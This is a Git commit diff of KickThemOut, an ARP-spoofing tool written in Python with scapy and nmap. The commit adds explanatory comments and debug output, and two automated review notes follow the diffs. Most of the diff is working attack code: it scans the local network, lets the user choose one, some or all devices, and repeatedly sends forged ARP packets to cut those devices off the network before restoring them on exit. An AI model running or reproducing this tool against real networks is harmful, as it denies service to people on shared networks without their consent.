Merge pull request #101 from xdavidhu/master

Added comments and scan info at start
Nikolaos Kamarinakis 2017-04-05 18:47:21 +03:00 committed by GitHub
commit dff6f304cc
3 changed files with 67 additions and 2 deletions


@ -11,10 +11,12 @@ See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
import time, os, sys, logging, math import time, os, sys, logging, math
from time import sleep from time import sleep
import urllib2 as urllib import urllib2 as urllib
import traceback
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
notRoot = False notRoot = False
try: try:
# Check if the user is root
if os.geteuid() != 0: if os.geteuid() != 0:
print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END) print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END)
notRoot = True notRoot = True
@ -34,7 +36,9 @@ except:
raise SystemExit raise SystemExit
def heading(): def heading():
sys.stdout.write(GREEN + """ # Function for printing the logo & info
spaces = " " * 76
sys.stdout.write(GREEN + spaces + """
@ -48,6 +52,7 @@ def heading():
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86)) '\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86))
def optionBanner(): def optionBanner():
# Function for printing the list of available commands
print('\nChoose option from menu:\n') print('\nChoose option from menu:\n')
sleep(0.2) sleep(0.2)
print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE) print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE)
@ -59,6 +64,7 @@ def optionBanner():
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
def runDebug(): def runDebug():
# Function for printing values & variables for debug
print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END) print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END)
print( print(
"{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){1}").format( "{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){1}").format(
@ -83,11 +89,18 @@ def runDebug():
print hostsList print hostsList
except: except:
print ("Failed to print hostsList array...") print ("Failed to print hostsList array...")
try:
print ("Crash trace: ")
print(traceback.format_exc())
except:
print ("Failed to print crash trace...")
print ("DEBUG FINISHED.\nShutting down...") print ("DEBUG FINISHED.\nShutting down...")
print("{0}").format(END) print("{0}").format(END)
raise SystemExit raise SystemExit
def regenOnlineIPs(): def regenOnlineIPs():
# Function for regenerating the onlineIPs array (made from the hostsLists array from the scan,
# but only with the IP's in it) and setting gateway's IP, and checking if its mac address is set
global onlineIPs global onlineIPs
global defaultGatewayMac global defaultGatewayMac
global defaultGatewayMacSet global defaultGatewayMacSet
@ -103,14 +116,17 @@ def regenOnlineIPs():
defaultGatewayMac = host[1] defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "": if not defaultGatewayMacSet and defaultGatewayMac == "":
# Ask for the gateway's mac address if scapy failed to detect it
print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = raw_input(header) defaultGatewayMac = raw_input(header)
defaultGatewayMacSet = True defaultGatewayMacSet = True
def scanNetwork(): def scanNetwork():
# Function for scanning the network with the 'scan.py'
global hostsList global hostsList
try: try:
# Passing the network variable to the scan with the 'True' setting of the getDefaultInterface
hostsList = scan.scanNetwork(getDefaultInterface(True)) hostsList = scan.scanNetwork(getDefaultInterface(True))
except KeyboardInterrupt: except KeyboardInterrupt:
print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END) print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END)
@ -118,14 +134,17 @@ def scanNetwork():
except: except:
print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END) print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END)
raise SystemExit raise SystemExit
# onlineIPs also get regenerated after every scan
regenOnlineIPs() regenOnlineIPs()
def kickoneoff(): def kickoneoff():
# kickoneoff function, launched if the user selects the number for this from the optionBanner
os.system("clear||cls") os.system("clear||cls")
print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END) print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork() scanNetwork()
# Print the list of online IP's with vendors
print("Online IPs: ") print("Online IPs: ")
for i in range(len(onlineIPs)): for i in range(len(onlineIPs)):
mac = "" mac = ""
@ -137,6 +156,7 @@ def kickoneoff():
canBreak = False canBreak = False
while not canBreak: while not canBreak:
# Get the input for which IP to target
try: try:
choice = int(raw_input("\nChoose a target: ")) choice = int(raw_input("\nChoose a target: "))
one_target_ip = onlineIPs[choice] one_target_ip = onlineIPs[choice]
@ -146,6 +166,7 @@ def kickoneoff():
except: except:
print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END) print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END)
# Get the mac address of the IP by looping trough the hostList array
one_target_mac = "" one_target_mac = ""
for host in hostsList: for host in hostsList:
if host[0] == one_target_ip: if host[0] == one_target_ip:
@ -159,13 +180,16 @@ def kickoneoff():
print("\n{0}Spoofing started... {1}").format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END)
try: try:
while True: while True:
# Send a malicious ARP packet in every 10 second
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
time.sleep(10) time.sleep(10)
except KeyboardInterrupt: except KeyboardInterrupt:
# Re-arp on KeyboardInterrupt
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END) print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
reArp = 1 reArp = 1
while reArp != 10: while reArp != 10:
try: try:
# Send 10 ARP packets with real information to restore the connections
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt: except KeyboardInterrupt:
pass pass
@ -177,11 +201,13 @@ def kickoneoff():
def kicksomeoff(): def kicksomeoff():
# kicksomeoff function, launched if the user selects the number for this from the optionBanner
os.system("clear||cls") os.system("clear||cls")
print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END) print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork() scanNetwork()
# Print the list of online IP's with vendors
print("Online IPs: ") print("Online IPs: ")
for i in range(len(onlineIPs)): for i in range(len(onlineIPs)):
mac = "" mac = ""
@ -193,6 +219,7 @@ def kicksomeoff():
canBreak = False canBreak = False
while not canBreak: while not canBreak:
# Get the input for which IPs to target
try: try:
choice = raw_input("\nChoose devices to target(comma-separated): ") choice = raw_input("\nChoose devices to target(comma-separated): ")
if ',' in choice: if ',' in choice:
@ -203,6 +230,7 @@ def kicksomeoff():
except KeyboardInterrupt: except KeyboardInterrupt:
return return
# Create a string list of the IPs to print it out later
some_ipList = "" some_ipList = ""
for i in some_targets: for i in some_targets:
try: try:
@ -214,11 +242,13 @@ def kicksomeoff():
return return
some_ipList = some_ipList[:-2] + END some_ipList = some_ipList[:-2] + END
# Print the string IP list
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END) print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
print("\n{0}Spoofing started... {1}").format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END)
try: try:
while True: while True:
# Send [number of targets] malicious ARP packet in every 10 second
for i in some_targets: for i in some_targets:
ip = onlineIPs[int(i)] ip = onlineIPs[int(i)]
for host in hostsList: for host in hostsList:
@ -226,9 +256,11 @@ def kicksomeoff():
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
time.sleep(10) time.sleep(10)
except KeyboardInterrupt: except KeyboardInterrupt:
# Re-arp on KeyboardInterrupt
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1 reArp = 1
while reArp != 10: while reArp != 10:
# Send 10 ARP packets with real information to restore the connections to every target
for i in some_targets: for i in some_targets:
ip = onlineIPs[int(i)] ip = onlineIPs[int(i)]
for host in hostsList: for host in hostsList:
@ -244,11 +276,13 @@ def kicksomeoff():
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def kickalloff(): def kickalloff():
# kickalloff function, launched if the user selects the number for this from the optionBanner
os.system("clear||cls") os.system("clear||cls")
print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END) print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork() scanNetwork()
# Print the list of online IP's with vendors
print("Online IPs: ") print("Online IPs: ")
for i in range(len(onlineIPs)): for i in range(len(onlineIPs)):
mac = "" mac = ""
@ -260,10 +294,13 @@ def kickalloff():
print("\n{0}Spoofing started... {1}").format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END)
try: try:
# Send [number of hosts in hostsList array] malicious ARP packet in every 10 second
reScan = 0 reScan = 0
while True: while True:
for host in hostsList: for host in hostsList:
# Loop trough hostsList array
if host[0] != defaultGatewayIP: if host[0] != defaultGatewayIP:
# Only sent the packet if the target is not the gateway
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
reScan += 1 reScan += 1
if reScan == 4: if reScan == 4:
@ -274,9 +311,11 @@ def kickalloff():
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1 reArp = 1
while reArp != 10: while reArp != 10:
# Send 10 ARP packets with real information to restore the connections to every target
for host in hostsList: for host in hostsList:
if host[0] != defaultGatewayIP: if host[0] != defaultGatewayIP:
try: try:
# Only sent the packet if the target is not the gateway
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt: except KeyboardInterrupt:
pass pass
@ -287,6 +326,7 @@ def kickalloff():
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def getDefaultInterface(returnNet=False): def getDefaultInterface(returnNet=False):
# Function for getting the default network interface of the machine with scapy
def long2net(arg): def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF): if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg)) raise ValueError("illegal netmask value", hex(arg))
@ -299,6 +339,7 @@ def getDefaultInterface(returnNet=False):
return None return None
return net return net
for network, netmask, _, interface, address in scapy.config.conf.route.routes: for network, netmask, _, interface, address in scapy.config.conf.route.routes:
# Loop trough ip addresses, skip if local
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
continue continue
if netmask <= 0 or netmask == 0xFFFFFFFF: if netmask <= 0 or netmask == 0xFFFFFFFF:
@ -308,21 +349,25 @@ def getDefaultInterface(returnNet=False):
continue continue
if net: if net:
if returnNet: if returnNet:
# Returning network if the returnNet is set to True (for the network scan)
return net return net
else: else:
return interface return interface
def getGatewayIP(): def getGatewayIP():
# Function for getting the IP of the gateway with scapy
try: try:
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway_p.src return getGateway_p.src
except: except:
# Ask for the gateway ip address if scapy failed to detect it
print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END) print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
gatewayIP = raw_input(header) gatewayIP = raw_input(header)
return gatewayIP return gatewayIP
def getDefaultInterfaceMAC(): def getDefaultInterfaceMAC():
# Function for getting the mac address of the default interface
try: try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface) defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac: if defaultInterfaceMac == "" or not defaultInterfaceMac:
@ -335,13 +380,16 @@ def getDefaultInterfaceMAC():
else: else:
return defaultInterfaceMac return defaultInterfaceMac
except: except:
# Ask for the mac address if scapy failed to detect it
print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
defaultInterfaceMac = raw_input(header) defaultInterfaceMac = raw_input(header)
return defaultInterfaceMac return defaultInterfaceMac
def resolveMac(mac): def resolveMac(mac):
# Function for resolving mac addresses to vendor names
try: try:
# Sending web request to macvendors.co
url = "http://macvendors.co/api/vendorname/" url = "http://macvendors.co/api/vendorname/"
request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"}) request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"})
response = urllib.urlopen(request) response = urllib.urlopen(request)
@ -354,20 +402,23 @@ def resolveMac(mac):
def main(): def main():
# Print the KickThemOut logo
heading() heading()
print( print(
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}" "\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
+ defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, + defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN,
RED, GREEN, RED, GREEN, END) RED, GREEN, RED, GREEN, END)
# Print warnings if there are no hosts up
if len(hostsList) == 0 or len(hostsList) == 1: if len(hostsList) == 0 or len(hostsList) == 1:
if len(hostsList) == 1: if len(hostsList) == 1:
if hostsList[0][0] == defaultGatewayIP: if hostsList[0][0] == defaultGatewayIP:
# If gateway found by the scan
print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format( print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format(
GREEN, RED, GREEN, RED, GREEN, END) GREEN, RED, GREEN, RED, GREEN, END)
raise SystemExit raise SystemExit
else: else:
# If no gateway or host found by the scan
print( print(
"\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format( "\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format(
GREEN, RED, GREEN, RED, GREEN, END) GREEN, RED, GREEN, RED, GREEN, END)
@ -378,13 +429,17 @@ def main():
try: try:
# Getting user input with while loop
while True: while True:
# Print menu items
optionBanner() optionBanner()
# Get user input
header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END)) header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
choice = raw_input(header) choice = raw_input(header)
# Handling the input
if choice.upper() == 'E' or choice.upper() == 'EXIT': if choice.upper() == 'E' or choice.upper() == 'EXIT':
print('\n{0}Thanks for dropping by.' print('\n{0}Thanks for dropping by.'
'\nCatch ya later!{1}').format(GREEN, END) '\nCatch ya later!{1}').format(GREEN, END)
@ -400,17 +455,24 @@ def main():
else: else:
print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END) print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END)
# Stopping loop on KeyboardInterrupt
except KeyboardInterrupt: except KeyboardInterrupt:
print('\n\n{0}Thanks for dropping by.' print('\n\n{0}Thanks for dropping by.'
'\nCatch ya later!{1}').format(GREEN, END) '\nCatch ya later!{1}').format(GREEN, END)
if __name__ == '__main__': if __name__ == '__main__':
# -- Start point --
# Setting the network info variables
sys.stdout.write("{0}Scanning your network, hang on...{1}\r".format(GREEN, END))
sys.stdout.flush()
defaultInterface = getDefaultInterface() defaultInterface = getDefaultInterface()
defaultGatewayIP = getGatewayIP() defaultGatewayIP = getGatewayIP()
defaultInterfaceMac = getDefaultInterfaceMAC() defaultInterfaceMac = getDefaultInterfaceMAC()
global defaultGatewayMacSet global defaultGatewayMacSet
defaultGatewayMacSet = False defaultGatewayMacSet = False
# Scanning network for the first time
scanNetwork() scanNetwork()
main() main()
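Review bot: In the runDebug hunk, `traceback.format_exc()` is read only after the earlier `try`/`except` blocks of the same function have run, so under Python 2 (the file uses `raw_input` and `urllib2`) a failure in one of those debug prints, such as the `print hostsList` guard, would replace the exception being reported and the "Crash trace" would show the wrong error; with no exception active it prints just `None`. Capture the trace once as the first statement of the function, `crash_trace = traceback.format_exc()`, and print `crash_trace` here; the wrapping `try`/`except` can then go, since printing a string will not raise. The trace also carries local file paths, and the banner asks users to post this output in a public issue, so the "private information removed" reminder is worth repeating next to the trace. The start of runDebug and its call sites are outside the hunk, so which exception is active on entry is not visible.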


@ -4,6 +4,7 @@
# authors: k4m4 & xdavidhu # authors: k4m4 & xdavidhu
def scanNetwork(network): def scanNetwork(network):
# Function for performing a network scan with nmap with the help of the python-nmap module
returnlist = [] returnlist = []
import nmap import nmap
nm = nmap.PortScanner() nm = nmap.PortScanner()
@ -16,4 +17,5 @@ def scanNetwork(network):
except: except:
pass pass
# returnlist = hostsList array
return returnlist return returnlist
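Review bot: The two comments added to scanNetwork say what the function is for but not what each entry of `returnlist` holds, which every caller depends on. The callers in the first file of this commit index entries as `host[0]` for the IP and `host[1]` for the MAC, so a docstring such as `"""Scan the given network with python-nmap and return one [ip, mac] entry per host found."""` would replace both comments and state that contract. The body between the two hunks is not shown, so the exact entry shape should be confirmed against it.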


@ -19,6 +19,7 @@ from scapy.all import (
) )
def sendPacket(my_mac, gateway_ip, target_ip, target_mac): def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
# Function for sending the malicious ARP packets out with the specified data
ether = Ether() ether = Ether()
ether.src = my_mac ether.src = my_mac